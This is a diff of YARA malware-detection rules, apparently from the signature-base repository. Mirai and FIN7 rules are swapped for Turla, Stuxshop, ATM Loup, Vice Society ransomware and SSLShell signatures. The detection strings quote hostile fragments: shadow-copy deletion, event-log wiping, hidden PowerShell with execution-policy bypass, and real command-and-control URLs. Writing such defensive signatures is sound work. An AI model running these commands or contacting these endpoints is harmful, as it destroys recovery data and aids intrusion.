 	meta:
-		description = "Detects ELF malware Mirai related"
-		author = "Florian Roth (Nextron Systems)"
-		id = "421b7708-030e-50d1-bf2e-e91758a48c00"
-		date = "2018-10-27"
+		description = "Detects Servantshell malware"
+		author = "Arbor Networks ASERT Nov 2015"
+		id = "f41e9191-0be1-59f7-9be4-e39c8a37b2c5"
+		date = "2017-02-02"
 		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L124-L138"
+		reference = "https://tinyurl.com/jmp7nrs"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_servantshell.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "47d20bdf64c18c925dc1391b022278f913b7fbce13988a7b5de2e9d135c5a265"
-		score = 75
+		logic_hash = "739057dc95831c9ed35981b40c606ecd0b3fd2118b42ed7c09e200dc0bc395db"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		hash1 = "fa0018e75f503f9748a5de0d14d4358db234f65e28c31c8d5878cc58807081c9"
 
 	strings:
-		$c01 = { 50 4F 53 54 20 2F 63 64 6E 2D 63 67 69 2F 00 00
-               20 48 54 54 50 2F 31 2E 31 0D 0A 55 73 65 72 2D
-               41 67 65 6E 74 3A 20 00 0D 0A 48 6F 73 74 3A }
+		$string1 = "SelfDestruction.cpp"
+		$string2 = "SvtShell.cpp"
+		$string3 = "InitServant"
+		$string4 = "DeinitServant"
+		$string5 = "CheckDT"
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_MAL_Mirai_Nov19_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1 : FILE
 {
 	meta:
-		description = "Detects Mirai malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "40edcb29-9e10-5b87-ba79-8e3f629829e5"
-		date = "2019-11-13"
+		description = "Detects Turla Linux malware x64 x32"
+		author = "Leonardo S.p.A."
+		id = "2da75433-b1c1-51b3-8f7a-a4442ca3de96"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/bad_packets/status/1194049104533282816"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L140-L157"
+		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_penquin.yar#L2-L33"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e1202a9cd445c590c359a9c93e635292f8cf7f09291f4d8504ad9ce6679f6a47"
+		logic_hash = "1e07963c492f1e6264f01ee292e40b188ca325b76005d9d48e6dc198cb9bdcf4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "bbb83da15d4dabd395996ed120435e276a6ddfbadafb9a7f096597c869c6c739"
-		hash2 = "fadbbe439f80cc33da0222f01973f27cce9f5ab0709f1bfbf1a954ceac5a579b"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
+		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
+		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
+		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
+		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
 
 	strings:
-		$s1 = "SERVZUXO" fullword ascii
-		$s2 = "-loldongs" fullword ascii
-		$s3 = "/dev/null" fullword ascii
-		$s4 = "/bin/busybox" fullword ascii
-		$sc1 = { 47 72 6F 75 70 73 3A 09 30 }
+		$ = "/root/.hsperfdata" ascii fullword
+		$ = "Desc| Filename | size |state|" ascii fullword
+		$ = "VS filesystem: %s" ascii fullword
+		$ = "File already exist on remote filesystem !" ascii fullword
+		$ = "/tmp/.sync.pid" ascii fullword
+		$ = "rem_fd: ssl " ascii fullword
+		$ = "TREX_PID=%u" ascii fullword
+		$ = "/tmp/.xdfg" ascii fullword
+		$ = "__we_are_happy__" ascii
+		$ = "/root/.sess" ascii fullword
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize <= 100KB and 4 of them
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 4 of them
 }
-rule SIGNATURE_BASE_MAL_ARM_LNX_Mirai_Mar13_2022 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Turla_Apr202004_1_Opcode : FILE
 {
 	meta:
-		description = "Detects new ARM Mirai variant"
-		author = "Mehmet Ali Kerimoglu a.k.a. CYB3RMX"
-		id = "54d8860e-fc45-5571-b68c-66590c67a705"
-		date = "2022-03-16"
+		description = "Detects Turla Linux malware x64 x32"
+		author = "Leonardo S.p.A."
+		id = "03043f59-c81a-5423-bec1-6cd88f6e3c52"
+		date = "2020-04-24"
 		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_mirai.yar#L159-L181"
+		reference = "https://www.leonardocompany.com/en/news-and-stories-detail/-/detail/knowledge-the-basis-of-protection"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_turla_penquin.yar#L35-L66"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a44a6174a198a658c8a5e2da50192da20bae7f8ed4e4f212c9eebb29fa4b0dd0"
+		logic_hash = "19524e6ec3b0d49ff9c85ce361ef1922b92e4f7876ddb7d6c9b209b5357080e3"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0283b72913b8a78b2a594b2d40ebc3c873e4823299833a1ff6854421378f5a68"
+		hash1 = "67d9556c695ef6c51abf6fbab17acb3466e3149cf4d20cb64d6d34dc969b6502"
+		hash2 = "8ccc081d4940c5d8aa6b782c16ed82528c0885bbb08210a8d0a8c519c54215bc"
+		hash3 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash4 = "1d5e4466a6c5723cd30caf8b1c3d33d1a3d4c94c25e2ebe186c02b8b41daf905"
+		hash5 = "2dabb2c5c04da560a6b56dbaa565d1eab8189d1fa4a85557a22157877065ea08"
+		hash6 = "3e138e4e34c6eed3506efc7c805fce19af13bd62aeb35544f81f111e83b5d0d4"
+		hash7 = "5a204263cac112318cd162f1c372437abf7f2092902b05e943e8784869629dd8"
+		hash8 = "8856a68d95e4e79301779770a83e3fad8f122b849a9e9e31cfe06bf3418fa667"
+		hash9 = "d49690ccb82ff9d42d3ee9d7da693fd7d302734562de088e9298413d56b86ed0"
 
 	strings:
-		$str1 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
-		$str2 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm/lib1funcs.asm"
-		$str3 = "/home/landley/aboriginal/aboriginal/build/temp-armv6l/gcc-core/gcc/config/arm"
-		$str4 = "/home/landley/aboriginal/aboriginal/build/simple-cross-compiler-armv6l/bin/../cc/include"
-		$attck1 = "attack.c"
-		$attck2 = "attacks.c"
-		$attck3 = "anti_gdb_entry"
-		$attck4 = "resolve_cnc_addr"
-		$attck5 = "attack_gre_eth"
-		$attck6 = "attack_udp_generic"
-		$attck7 = "attack_get_opt_ip"
-		$attck8 = "attack_icmpecho"
+		$op0 = { 8D 41 05 32 06 48 FF C6 88 81 E0 80 69 00 }
+		$op1 = { 48FFC14883F94975E9 }
+		$op2 = { C7 05 9B 7D 29 00 1D 00 00 00 C7 05 2D 7B 29 00 65 74 68 30 C6 05 2A 7B 29 00 00 E8 }
+		$op3 = { BF FF FF FF FF E8 96 9D 0A 00 90 90 90 90 90 90 90 90 90 90 89 F0}
+		$op4 = { 88D380C305329AC1D60C08889A60A10F084283FA0876E9 }
+		$op5 = { 8B 8D 50 DF FF FF B8 09 00 00 00 89 44 24 04 89 0C 24 E8 DD E5 02 00 }
+		$op6 = { 8D 5A 05 32 9A 60 26 0C 08 88 9A 20 F4 0E 08 42 83 FA 48 76 EB }
+		$op7 = { 8D 4A 05 32 8A 25 26 0C 08 88 8A 20 F4 0E 08 42 83 FA 08 76 EB}
 
 	condition:
-		uint16( 0 ) == 0x457f and ( 3 of ( $str* ) or 4 of ( $attck* ) )
+		uint16( 0 ) == 0x457f and filesize < 5000KB and 2 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Strings_Aug18_1
+rule SIGNATURE_BASE_Scanbox_Malware_Generic
 {
 	meta:
-		description = "Detects strings from FIN7 report in August 2018"
+		description = "Scanbox Chinese Deep Panda APT Malware http://goo.gl/MUUfjv and http://goo.gl/WXUQcP"
 		author = "Florian Roth (Nextron Systems)"
-		id = "9b940986-e41b-5fbf-9e42-cb0fd550e541"
-		date = "2018-08-01"
+		id = "f7867e65-567f-530f-83d4-b5126021e523"
+		date = "2015-02-28"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L13-L30"
+		reference = "http://goo.gl/WXUQcP"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_scanbox_deeppanda.yar#L2-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "89d2f8f28a7ab0e78c53d8c41b45efa60cfa9ff72306c49197f52342d9a3c546"
+		logic_hash = "5f521d3f000fb39e5e3b08657e75219e93fb3bb8ffbbdbd70f471928a56bef27"
 		score = 75
 		quality = 85
 		tags = ""
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b6354e46af0d69b6998dbed2fceae60a3b207584e08179748e65511d45849b00"
+		hash1 = "8d168092d5601ebbaed24ec3caeef7454c48cf21366cd76560755eb33aff89e9"
+		hash2 = "d4be6c9117db9de21138ae26d1d0c3cfb38fd7a19fa07c828731fa2ac756ef8d"
+		hash3 = "3fe208273288fc4d8db1bf20078d550e321d9bc5b9ab80c93d79d2cb05cbf8c2"
 
 	strings:
-		$s1 = "&&call %a01%%a02% /e:jscript" ascii
-		$s2 = "wscript.exe //b /e:jscript %TEMP%" ascii
-		$s3 = " w=wsc@ript /b " ascii
-		$s4 = "@echo %w:@=%|cmd" ascii
-		$s5 = " & wscript //b /e:jscript"
+		$s0 = "http://142.91.76.134/p.dat" fullword ascii
+		$s1 = "HttpDump 1.1" fullword ascii
+		$s3 = "SecureInput .exe" fullword wide
+		$s4 = "http://extcitrix.we11point.com/vpn/index.php?ref=1" fullword ascii
+		$s5 = "%SystemRoot%\\System32\\svchost.exe -k msupdate" fullword ascii
+		$s6 = "ServiceMaix" fullword ascii
+		$x1 = "Management Support Team1" fullword ascii
+		$x2 = "DTOPTOOLZ Co.,Ltd.0" fullword ascii
+		$x3 = "SEOUL1" fullword ascii
 
 	condition:
-		1 of them
+		(1 of ( $s* ) and 2 of ( $x* ) ) or ( 3 of ( $x* ) )
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_2 : FILE
+rule SIGNATURE_BASE_STUXSHOP_Config
 {
 	meta:
-		description = "Detects FIN7 malware sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "885eebfe-2587-5744-ba0c-c74ced946050"
-		date = "2018-08-01"
+		description = "Stuxshop standalone sample configuration"
+		author = "JAG-S (turla@chronicle.security)"
+		id = "67367db5-51b3-5177-960a-5b06161154e2"
+		date = "2019-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L32-L49"
+		reference = "https://medium.com/chronicle-blog/who-is-gossipgirl-3b4170f846c0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxshop.yar#L2-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "a46492383db5af8f60984b42c53a792632f836f1668fca2d564e0f1f1ed313f2"
+		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
+		logic_hash = "9dd57f8b4e25a53dcf54dc75a1bb26675c7dd04dbb4d96286bcc0a6527a21782"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1513c7630c981e4b1d0d5a55809166721df4f87bb0fac2d2b8ff6afae187f01d"
+		tags = ""
 
 	strings:
-		$x1 = "Description: C:\\Users\\oleg\\Desktop\\" wide
-		$x2 = "/*|*| *  Copyright 2016 Microsoft, Industries.|*| *  All rights reserved.|*|" ascii
-		$x3 = "32, 40, 102, 105, 108, 101, 95, 112, 97, 116, 104, 41, 41, 32" ascii
-		$x4 = "83, 108, 101, 101, 112, 40, 51, 48, 48, 48, 41, 59, 102, 115" ascii
-		$x5 = "80, 80, 68, 65, 84, 65, 37, 34, 41, 44, 115, 104, 101, 108, 108" ascii
+		$cnc1 = "http://211.24.237.226/index.php?data=" ascii wide
+		$cnc2 = "http://todaysfutbol.com/index.php?data=" ascii wide
+		$cnc3 = "http://78.111.169.146/index.php?data=" ascii wide
+		$cnc4 = "http://mypremierfutbol.com/index.php?data=" ascii wide
+		$regkey1 = "Software\\Microsoft\\Windows\\CurrentVersion\\MS-DOS Emulation" ascii wide
+		$regkey2 = "NTVDMParams" ascii wide
+		$flowerOverlap1 = { 85 C0 75 3B 57 FF 75 1C FF 75 18 FF 75 14 50 FF 75 10 FF 75 FC FF 15 }
+		$flowerOverlap2 = { 85 C0 75 4C 8B 45 1C 89 45 0C 8D 45 0C 50 8D 45 08 FF 75 18 50 6A 00 FF 75 10 FF 75 20 FF 15 }
+		$flowerOverlap3 = { 55 8B EC 53 56 8B 75 20 85 F6 74 03 83 26 00 8D 45 20 50 68 19 00 02 00 6A 00 FF 75 0C FF 75 08 }
+		$flowerOverlap4 = { 55 8B EC 51 8D 4D FC 33 C0 51 50 6A 26 50 89 45 FC FF 15 }
+		$flowerOverlap5 = { 85 DB 74 04 8B C3 EB 1A 8B 45 08 3B 45 14 74 07 B8 5D 06 00 00 EB 0B 85 F6 74 05 8B 45 0C 89 06 }
+		$flowerOverlap6 = { 85 FF 74 12 83 7D F8 01 75 0C FF 75 0C FF 75 08 FF 15 }
 
 	condition:
-		uint16( 0 ) == 0xcfd0 and filesize < 2000KB and 1 of them
+		all of ( $flowerOverlap* ) or 2 of ( $cnc* ) or all of ( $regkey* )
 }
-rule SIGNATURE_BASE_APT_FIN7_Maldoc_Aug18_1 : FILE
+rule SIGNATURE_BASE_STUXSHOP_Oscheck
 {
 	meta:
-		description = "Detects malicious Doc from FIN7 campaign"
-		author = "Florian Roth (Nextron Systems)"
-		id = "f3c430e0-be9a-5c3f-9378-a20ef0492afb"
-		date = "2018-08-01"
+		description = "Identifies the OS Check function in STUXSHOP and CheshireCat"
+		author = "Silas Cutler (havex@Chronicle.Security)"
+		id = "24fb5c6f-d5ab-5f17-942c-b712e2c017d4"
+		date = "2019-04-09"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L51-L64"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_stuxshop.yar#L32-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "f3ecf77a5f909361f4a6af5ca0f25ec85721570587500a8ce2ef203158472e47"
+		hash = "c1961e54d60e34bbec397c9120564e8d08f2f243ae349d2fb20f736510716579"
+		logic_hash = "3dca26e622289c2d244e3af035e892455a47daa67dbe0c6fad29d9f7403cbc6b"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c12591c850a2d5355be0ed9b3891ccb3f42e37eaf979ae545f2f008b5d124d6"
+		tags = ""
 
 	strings:
-		$s1 = "<photoshop:LayerText>If this document was downloaded from your email, please click  \"Enable editing\" from the yellow bar above" ascii
+		$ = {10 F7 D8 1B C0 83 C0 ?? E9 ?? 01 00 00 39 85 7C FF FF FF 0F 85 ?? 01 00
+      00 83 BD 70 FF FF FF 04 8B 8D 74 FF FF FF 75 0B 85 C9 0F 85 ?? 01 00 00 6A 05
+      5E }
+		$ = {01 00 00 3B FA 0F 84 ?? 01 00 00 80 7D 80 00 B1 62 74 1D 6A 0D 8D 45 80
+      68 ?? ?? ?? 10 50 FF 15 ?? ?? ?? 10 83 C4 0C B1 6F 85 C0 75 03 8A 4D 8D 8B C6
+      }
 
 	condition:
-		filesize < 800KB and 1 of them
+		any of them
 }
-rule SIGNATURE_BASE_APT_FIN7_Sample_Aug18_1 : FILE
+rule SIGNATURE_BASE_ATM_Malware_Loup_1 : FILE
 {
 	meta:
-		description = "Detects FIN7 samples mentioned in FireEye report"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0fdd98e8-7536-5159-8085-da7388e5fff2"
-		date = "2018-08-01"
+		description = "Detects ATM Malware Loup"
+		author = "Frank Boldewin (@r3c0nst)"
+		id = "2215a93f-d854-5f9b-b5cd-53962c45db08"
+		date = "2020-08-17"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L66-L93"
+		reference = "https://twitter.com/r3c0nst/status/1295275546780327936"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_loup.yar#L3-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5ff078f8cb93a841b68521cfbc120b18952c7ff5b56ab2f3b0eebf63a10aa572"
+		hash = "6c9e9f78963ab3e7acb43826906af22571250dc025f9e7116e0201b805dc1196"
+		logic_hash = "5068c3f27cf821f512fb9a473d2bd45066d550f30fbc26f0cbebbe103e6f4ccb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "a1e95ac1bb684186e9fb5c67f75c7c26ddc8b18ebfdaf061742ddf1675e17d55"
-		hash2 = "dc645aae5d283fa175cf463a19615ed4d16b1d5238686245574d8a6a8b0fc8fa"
-		hash3 = "eebbce171dab636c5ac0bf0fd14da0e216758b19c0ce2e5c572d7e6642d36d3d"
 
 	strings:
-		$s1 = "\\par var console=\\{\\};console.log=function()\\{\\};" ascii
-		$s2 = "616e64792d7063" ascii
-		$x1 = "0043003a005c00550073006500720073005c0061006e00640079005c004400650073006b0074006f0070005c0075006e00700072006f0074006500630074" ascii
-		$x2 = "780065006300750074006500280022004f006e0020004500720072006f007200200052006500730075006d00650020004e006500780074003a0073006500" ascii
-		$x3 = "\\par \\tab \\tab \\tab sh.Run \"powershell.exe -NoE -NoP -NonI -ExecutionPolicy Bypass -w Hidden -File \" & pToPSCb, 0, False" fullword ascii
-		$x4 = "002e006c006e006b002d00000043003a005c00550073006500720073005c007400650073007400610064006d0069006e002e0054004500530054005c0044" ascii
-		$x5 = "005c00550073006500720073005c005400450053005400410044007e0031002e005400450053005c0041007000700044006100740061005c004c006f0063" ascii
-		$x6 = "6c00690063006100740069006f006e002200220029003a00650078006500630075007400650020007700700072006f0074006500630074002e0041006300" ascii
-		$x7 = "7374656d33325c6d736874612e657865000023002e002e005c002e002e005c002e002e005c00570069006e0064006f00770073005c005300790073007400" ascii
-		$x8 = "\\par \\tab \\tab sh.Run \"%comspec% /c tasklist >\"\"\" & tpath & \"\"\" 2>&1\", 0, true" fullword ascii
-		$x9 = "00720079007b006500760061006c0028002700770061006c006c003d004700650074004f0062006a0065006300740028005c005c0027005c005c00270027" ascii
-		$x10 = "006e00640079005c004400650073006b0074006f0070005c0075006e006c006f0063006b002e0064006f0063002e006c006e006b" ascii
+		$String1 = "C:\\Users\\muham\\source\\repos\\loup\\Debug\\loup.pdb" ascii
+		$String2 = "CurrencyDispenser1" ascii
+		$Code = {50 68 C0 D4 01 00 8D 4D E8 51 68 2E 01 00 00 0F B7 55 08 52 E8}
 
 	condition:
-		uint16( 0 ) == 0x5c7b and filesize < 3000KB and ( 1 of ( $x* ) or 2 of them )
+		uint16( 0 ) == 0x5A4D and filesize < 100KB and all of ( $String* ) and $Code
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_1 : FILE
+rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Polyvice_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Detects NTRU-ChaChaPoly (PolyVice) malware used by Vice Society"
 		author = "Florian Roth (Nextron Systems)"
-		id = "46c82d27-5683-5acd-9a3c-d69613091ecc"
-		date = "2018-08-01"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L95-L108"
+		id = "e450407c-6c21-56bf-aedf-8e7f3890abe2"
+		date = "2023-01-12"
+		modified = "2023-01-13"
+		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_vicesociety_dec22.yar#L2-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7144d4c7651e3fb288ef608fdff07af6cb223c90c34fb780d65184760386d5c7"
+		logic_hash = "3c7b76a693e5666515afee5c819b21e119ce5f1b0be675252673e6a24251ce8d"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7f16cbe7aa1fbc5b8a95f9d123f45b7e3da144cb88db6e1da3eca38cf88660cb"
+		hash1 = "326a159fc2e7f29ca1a4c9a64d45b76a4a072bc39ba864c49d804229c5f6d796"
+		hash2 = "8c8cb887b081e0d92856fb68a7df0dabf0b26ed8f0a6c8ed22d785e596ce87f4"
+		hash3 = "9d9e949ecd72d7a7c4ae9deae4c035dcae826260ff3b6e8a156240e28d7dbfef"
 
 	strings:
-		$s1 = "Manche Enterprises Limited0" fullword ascii
+		$x1 = "C:\\Users\\root\\Desktop\\niX\\CB\\libntru\\" ascii
+		$s1 = "C:\\Users\\root" ascii fullword
+		$s2 = "#DBG: target = %s" ascii fullword
+		$s3 = "# ./%s [-p <path>]/[-f <file> ] [-e <enc.extension>] [-m <requirements file name>]" ascii fullword
+		$s4 = "### ################# ###" ascii fullword
+		$op1 = { 89 ca 41 01 fa 89 ef 8b 6c 24 24 44 89 c9 09 d1 44 31 e6 89 c8 }
+		$op2 = { bd 02 00 00 00 29 cd 48 0f bf d1 8b 44 46 02 01 44 53 02 8d 54 0d 00 83 c1 02 48 0f bf c2 }
+		$op3 = { 48 29 c4 4c 8d 74 24 30 4c 89 f1 e8 46 3c 00 00 84 c0 41 89 c4 0f 85 2b 02 00 00 0f b7 45 f2 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of them
+		uint16( 0 ) == 0x5a4d and filesize < 400KB and ( 1 of ( $x* ) or 2 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_RANSOM_Vicesociety_Chily_Jan23_1 : FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
+		description = "Detects Chily or SunnyDay malware used by Vice Society"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4522cd85-ba85-5afd-8600-1ebabfaf6d02"
-		date = "2018-08-01"
+		id = "1be4adb9-e60c-5023-9230-07f5fd16daaa"
+		date = "2023-01-12"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L110-L124"
+		reference = "https://www.sentinelone.com/labs/custom-branded-ransomware-the-vice-society-group-and-the-threat-of-outsourced-development/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_ransom_vicesociety_dec22.yar#L33-L63"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8e62c9488f211635ae30633a0d894b00e0ba2a7e7d4cb628117a166d4f0f9697"
-		score = 75
-		quality = 85
+		logic_hash = "fc2967d86bf73033e68b8b9409a197ae8f7fcdf06e1e2a17e3d277d243caa541"
+		score = 80
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "60cd98fc4cb2ae474e9eab81cd34fd3c3f638ad77e4f5d5c82ca46f3471c3020"
+		hash1 = "4dabb914b8a29506e1eced1d0467c34107767f10fdefa08c40112b2e6fc32e41"
 
 	strings:
-		$s1 = "constructor or from DllMain." fullword ascii
-		$s2 = "Network Software Ltd0" fullword ascii
+		$x1 = ".[Chily@Dr.Com]" ascii fullword
+		$s1 = "localbitcoins.com/buy_bitcoins'>https://localbitcoins.com/buy_bitcoins</a>" ascii fullword
+		$s2 = "C:\\Users\\root\\Desktop" ascii fullword
+		$s3 = "for /F \"tokens=*\" %1 in ('wevtutil.exe el') DO wevtutil.exe cl \"%1\"" wide fullword
+		$s4 = "cd %userprofile%\\documents\\" wide
+		$s5 = "noise.bmp" wide fullword
+		$s6 = " Execution time: %fms (1sec=1000ms)" ascii fullword
+		$s7 = "/c vssadmin.exe Delete Shadows /All /Quiet" wide fullword
+		$op1 = { 4c 89 c5 89 ce 89 0d f5 41 02 00 4c 89 cf 44 8d 04 49 0f af f2 89 15 e9 41 02 00 44 89 c0 }
+		$op2 = { 48 8b 03 48 89 d9 ff 50 10 84 c0 0f 94 c0 01 c0 48 83 c4 20 5b }
+		$op3 = { 31 c0 47 8d 2c 00 45 85 f6 4d 63 ed 0f 8e ec 00 00 00 0f 1f 80 00 00 00 00 0f b7 94 44 40 0c 00 00 83 c1 01 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 400KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 3 of them ) or 4 of them
 }
-rule SIGNATURE_BASE_APT_FIN7_EXE_Sample_Aug18_3 : FILE
+rule SIGNATURE_BASE_MAL_ELF_Reverseshell_Sslshell_Jun23_1 : CVE_2023_2868 FILE
 {
 	meta:
-		description = "Detects sample from FIN7 report in August 2018"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b0ce882-1c18-5741-bb71-0cef010dc778"
-		date = "2018-08-01"
+		description = "Detects reverse shell named SSLShell used in Barracuda ESG exploitation (CVE-2023-2868)"
+		author = "Florian Roth"
+		id = "91b34eb7-61d2-592e-a444-249da43994ca"
+		date = "2023-06-07"
 		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_fin7.yar#L126-L140"
+		reference = "https://www.barracuda.com/company/legal/esg-vulnerability"
